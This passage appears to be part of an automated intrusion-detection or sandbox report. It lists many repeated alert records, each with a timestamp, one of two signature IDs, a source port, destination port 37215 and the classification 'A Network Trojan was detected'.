            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.636259
            SID:2835222
            Source Port:33514
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.718020
            SID:2835222
            Source Port:51782
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.443203
            SID:2829579
            Source Port:55518
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507514
            SID:2829579
            Source Port:40216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.515685
            SID:2829579
            Source Port:41032
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.537358
            SID:2829579
            Source Port:38944
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.574584
            SID:2829579
            Source Port:50740
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.062671
            SID:2835222
            Source Port:60424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.634659
            SID:2829579
            Source Port:39770
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.079346
            SID:2829579
            Source Port:41964
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.276735
            SID:2829579
            Source Port:45260
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.818288
            SID:2835222
            Source Port:40264
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.934982
            SID:2835222
            Source Port:34318
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:16.999376
            SID:2829579
            Source Port:40790
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.278358
            SID:2835222
            Source Port:36630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.818036
            SID:2829579
            Source Port:49994
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.435474
            SID:2829579
            Source Port:59708
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.818704
            SID:2835222
            Source Port:46750
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.863629
            SID:2829579
            Source Port:40122
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.759703
            SID:2835222
            Source Port:54332
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.734152
            SID:2829579
            Source Port:49982
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.848441
            SID:2835222
            Source Port:42636
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.377151
            SID:2829579
            Source Port:33016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.544548
            SID:2835222
            Source Port:39482
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.963026
            SID:2835222
            Source Port:35260
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.921788
            SID:2829579
            Source Port:55902
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:48.631748
            SID:2829579
            Source Port:52914
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.774593
            SID:2829579
            Source Port:56484
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.905788
            SID:2829579
            Source Port:46348
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.319638
            SID:2829579
            Source Port:51902
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.282667
            SID:2835222
            Source Port:50550
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.066433
            SID:2835222
            Source Port:59516
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507222
            SID:2835222
            Source Port:43198
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.918536
            SID:2829579
            Source Port:58090
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.300198
            SID:2835222
            Source Port:42450
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.559220
            SID:2829579
            Source Port:46918
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.864838
            SID:2829579
            Source Port:52148
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.555083
            SID:2835222
            Source Port:55684
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.811734
            SID:2829579
            Source Port:48384
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.508040
            SID:2835222
            Source Port:57248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.766501
            SID:2829579
            Source Port:54964
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.774093
            SID:2835222
            Source Port:58824
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.321457
            SID:2835222
            Source Port:59440
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.510815
            SID:2829579
            Source Port:54124
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.877725
            SID:2835222
            Source Port:59170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.986933
            SID:2829579
            Source Port:51892
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.987228
            SID:2835222
            Source Port:39788
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.924247
            SID:2835222
            Source Port:50624
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.968848
            SID:2835222
            Source Port:39566
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.715545
            SID:2835222
            Source Port:33194
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.580587
            SID:2835222
            Source Port:59534
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.584570
            SID:2829579
            Source Port:53354
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.211716
            SID:2835222
            Source Port:55392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.436999
            SID:2835222
            Source Port:33752
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.948187
            SID:2829579
            Source Port:43438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.385579
            SID:2829579
            Source Port:37340
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.386267
            SID:2835222
            Source Port:59306
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.709946
            SID:2835222
            Source Port:50002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.862769
            SID:2835222
            Source Port:43080
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.943482
            SID:2835222
            Source Port:55806
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.922554
            SID:2835222
            Source Port:46812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.902128
            SID:2835222
            Source Port:38072
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.423686
            SID:2829579
            Source Port:36608
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.307599
            SID:2835222
            Source Port:56038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.378765
            SID:2829579
            Source Port:48610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.862631
            SID:2829579
            Source Port:48690
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.299200
            SID:2835222
            Source Port:44572
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.896020
            SID:2835222
            Source Port:40864
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.904057
            SID:2829579
            Source Port:48370
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.825383
            SID:2835222
            Source Port:47756
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.779005
            SID:2829579
            Source Port:41448
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.865547
            SID:2829579
            Source Port:59918
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.341806
            SID:2835222
            Source Port:47340
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.334971
            SID:2829579
            Source Port:49096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.421859
            SID:2835222
            Source Port:52402
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.732644
            SID:2829579
            Source Port:42612
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.840855
            SID:2829579
            Source Port:36316
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.744364
            SID:2829579
            Source Port:35512
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:09.969227
            SID:2829579
            Source Port:38178
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.961198
            SID:2829579
            Source Port:49468
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.290406
            SID:2829579
            Source Port:57534
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.919525
            SID:2835222
            Source Port:46372
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.682276
            SID:2829579
            Source Port:60460
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:45.601794
            SID:2829579
            Source Port:38260
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.852891
            SID:2835222
            Source Port:41620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.054921
            SID:2829579
            Source Port:34944
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:51.665852
            SID:2835222
            Source Port:50538
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.759817
            SID:2835222
            Source Port:39134
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.903510
            SID:2835222
            Source Port:57320
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.746295
            SID:2835222
            Source Port:41292
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.999300
            SID:2835222
            Source Port:40688
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.741642
            SID:2829579
            Source Port:48004
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.566019
            SID:2835222
            Source Port:42634
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.859415
            SID:2829579
            Source Port:60482
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.252176
            SID:2835222
            Source Port:36808
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.996108
            SID:2835222
            Source Port:35206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.810187
            SID:2829579
            Source Port:35858
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.931152
            SID:2829579
            Source Port:50740
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.617444
            SID:2829579
            Source Port:44106
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:38.499384
            SID:2829579
            Source Port:53520
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862878
            SID:2829579
            Source Port:49078
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:45.602967
            SID:2829579
            Source Port:47906
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.822167
            SID:2835222
            Source Port:55032
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.740239
            SID:2835222
            Source Port:43114
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.746968
            SID:2835222
            Source Port:47604
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.935181
            SID:2835222
            Source Port:35352
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.298695
            SID:2835222
            Source Port:36778
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.934213
            SID:2829579
            Source Port:44838
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.877788
            SID:2829579
            Source Port:48480
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.065189
            SID:2835222
            Source Port:58158
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.821760
            SID:2829579
            Source Port:50290
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.025744
            SID:2835222
            Source Port:58698
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.737160
            SID:2835222
            Source Port:54486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.805254
            SID:2835222
            Source Port:45358
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.054275
            SID:2829579
            Source Port:52640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.993164
            SID:2835222
            Source Port:34266
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.047360
            SID:2835222
            Source Port:47876
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.771755
            SID:2835222
            Source Port:55076
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.961416
            SID:2829579
            Source Port:39286
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.877568
            SID:2835222
            Source Port:56712
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039045
            SID:2835222
            Source Port:42024
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.840062
            SID:2829579
            Source Port:52038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.493652
            SID:2835222
            Source Port:53184
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.065812
            SID:2829579
            Source Port:43458
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.517678
            SID:2829579
            Source Port:43812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.776848
            SID:2835222
            Source Port:36138
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.380308
            SID:2835222
            Source Port:56582
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.442361
            SID:2835222
            Source Port:51324
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.622634
            SID:2829579
            Source Port:37608
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.064950
            SID:2829579
            Source Port:47502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.917794
            SID:2835222
            Source Port:51500
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.559389
            SID:2835222
            Source Port:46002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.988237
            SID:2829579
            Source Port:54944
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862016
            SID:2829579
            Source Port:37066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.995240
            SID:2829579
            Source Port:55234
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.507460
            SID:2835222
            Source Port:51324
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.696772
            SID:2829579
            Source Port:42386
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.654731
            SID:2829579
            Source Port:35870
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.736140
            SID:2829579
            Source Port:46916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.979494
            SID:2835222
            Source Port:39844
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.864309
            SID:2829579
            Source Port:49016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.872598
            SID:2829579
            Source Port:41880
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.885248
            SID:2829579
            Source Port:33218
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.520768
            SID:2829579
            Source Port:40290
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.073094
            SID:2835222
            Source Port:33326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.669786
            SID:2829579
            Source Port:60548
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.697442
            SID:2829579
            Source Port:37126
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.887181
            SID:2835222
            Source Port:54136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.899680
            SID:2829579
            Source Port:49514
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.537282
            SID:2835222
            Source Port:58762
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.450639
            SID:2835222
            Source Port:39654
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.858629
            SID:2829579
            Source Port:38710
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.543334
            SID:2829579
            Source Port:47640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.543372
            SID:2829579
            Source Port:53704
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.432180
            SID:2829579
            Source Port:37946
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:55.679938
            SID:2835222
            Source Port:45640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.877648
            SID:2835222
            Source Port:36754
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.827245
            SID:2835222
            Source Port:52294
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.034783
            SID:2829579
            Source Port:43076
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.299953
            SID:2835222
            Source Port:51958
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.656530
            SID:2835222
            Source Port:58144
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:33.384775
            SID:2829579
            Source Port:35100
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.326853
            SID:2829579
            Source Port:53444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862639
            SID:2829579
            Source Port:44972
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.766985
            SID:2829579
            Source Port:36084
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.040670
            SID:2829579
            Source Port:54574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.649847
            SID:2835222
            Source Port:39486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.732685
            SID:2835222
            Source Port:57160
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.289676
            SID:2829579
            Source Port:32964
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.853299
            SID:2835222
            Source Port:45640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:04.899680
            SID:2835222
            Source Port:46306
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.058775
            SID:2835222
            Source Port:56644
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.290690
            SID:2829579
            Source Port:43928
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.523696
            SID:2835222
            Source Port:36164
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.842416
            SID:2829579
            Source Port:49750
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:36.445663
            SID:2835222
            Source Port:36992
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.074981
            SID:2835222
            Source Port:45360
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.995237
            SID:2835222
            Source Port:35972
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.351816
            SID:2835222
            Source Port:45050
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.716189
            SID:2835222
            Source Port:60982
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.309105
            SID:2829579
            Source Port:43256
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.999315
            SID:2835222
            Source Port:52158
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.810887
            SID:2829579
            Source Port:45582
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.825365
            SID:2829579
            Source Port:37094
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:39.470141
            SID:2829579
            Source Port:54432
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.940206
            SID:2829579
            Source Port:37886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.860470
            SID:2835222
            Source Port:48698
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.196318
            SID:2835222
            Source Port:52282
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.775859
            SID:2835222
            Source Port:44094
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.879457
            SID:2835222
            Source Port:58916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.737208
            SID:2829579
            Source Port:39132
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.770866
            SID:2835222
            Source Port:46474
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.944201
            SID:2835222
            Source Port:42292
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.696686
            SID:2829579
            Source Port:59872
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.920118
            SID:2835222
            Source Port:58236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.276921
            SID:2835222
            Source Port:38110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.995150
            SID:2829579
            Source Port:46068
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
